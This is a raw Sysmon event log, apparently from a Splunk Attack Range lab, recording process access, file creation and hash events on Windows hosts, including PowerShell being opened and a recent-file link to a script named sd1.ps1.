10341000x80000000000000001051176Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.462{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051175Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.461{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051174Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.461{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-817D-00000000CF01}8472C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051173Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.449{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051172Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.449{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051171Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.448{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051170Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.447{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5E6-60EB-827D-00000000CF01}9724C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051169Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:36.025{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0332463998827EF697D50867C82ACB57,SHA256=86497BC5F750A950A04539A22514A4154241C25DC2C6BEA6E2CFC1B2DB7922A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808568Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:37.805{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=27D40CF324528DCC4AB430D6E64009B3,SHA256=74DF655B72EE2FEE7BFC3958576CA56987C2D938241148BA3C1C6CE8612D2AE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051179Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:37.729{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=90696571990FD49B63CC03F84DC8371B,SHA256=688B2919C6BDC96BC044B40AEF076F07DD9013F3D6450DA72388D2413C3E6BA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051178Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:37.040{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D46ACA775201C1D69CB1CAC3BC0E1849,SHA256=2A9D77FE5135F1F15A34B0A9DEA78986697BE4FD03B2838ADB1BB264A13F60CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808569Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:38.852{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50EE88BA2F3C85C2B0EB095F53A124E4,SHA256=BD396FFD680E45DA40047AB84B953DA6B96A742EED2E0B6EF998883A36F949A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051181Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:38.569{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=DAD2B917F1D871147CF0677C461BA738,SHA256=41E4EB8F821132DBF06364BE5F418E913C81A5E1395DC731978EB6D7E6FE6C32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051180Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:38.054{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41E558C4FAFC2A90B31326C4F1E89956,SHA256=B7B35E50274AAE0DF372748D9A1C3FB769D3E2655B1FA34DEC91C759CC9E8F22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808571Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:57:39.868{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0AE97D3A2DCBFAB4806659125DD0CF5A,SHA256=4A9EDD82A436C786120119AF9D64E57F60B36CB81C6BB8061E2A57BDE84E0B88,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051210Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.968{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051209Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.968{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051208Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.968{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051207Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.952{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051206Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.937{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051205Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051204Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051203Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051202Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567136C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051201Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051200Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051199Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62250|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051198Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.905{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d2c9|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051197Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.890{466BC892-02B0-60E8-1600-00000000CF01}13044400C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051196Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.890{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051195Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.790{466BC892-F5F3-60EB-887D-00000000CF01}76689772C:\Windows\system32\conhost.exe{466BC892-F5F3-60EB-877D-00000000CF01}9944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001051194Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.690{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 23542300x80000000000000001051193Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.690{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=A1920FFB99EBC00DBFD0FB3C2892097D,SHA256=6E4CC3AB44A361E4A311CB8C7203335C17F1816E641E41C33CD161799A2B3BE8,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001051192Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.676{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnk2021-07-12 07:47:36.117 23542300x80000000000000001051191Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.673{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\sd1.ps1.lnkMD5=12125687D25AE935FA2EA7F6E92AE2DD,SHA256=B10C72356DA1CB0E8201D7086D5448DB79394E288A0313AE3922EE5DC3A36FB9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051190Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.670{466BC892-32CD-60E8-670B-00000000CF01}45164260C:\Windows\system32\csrss.exe{466BC892-F5F3-60EB-887D-00000000CF01}7668C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001051189Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051188Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051187Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:57:39.636{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051186Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 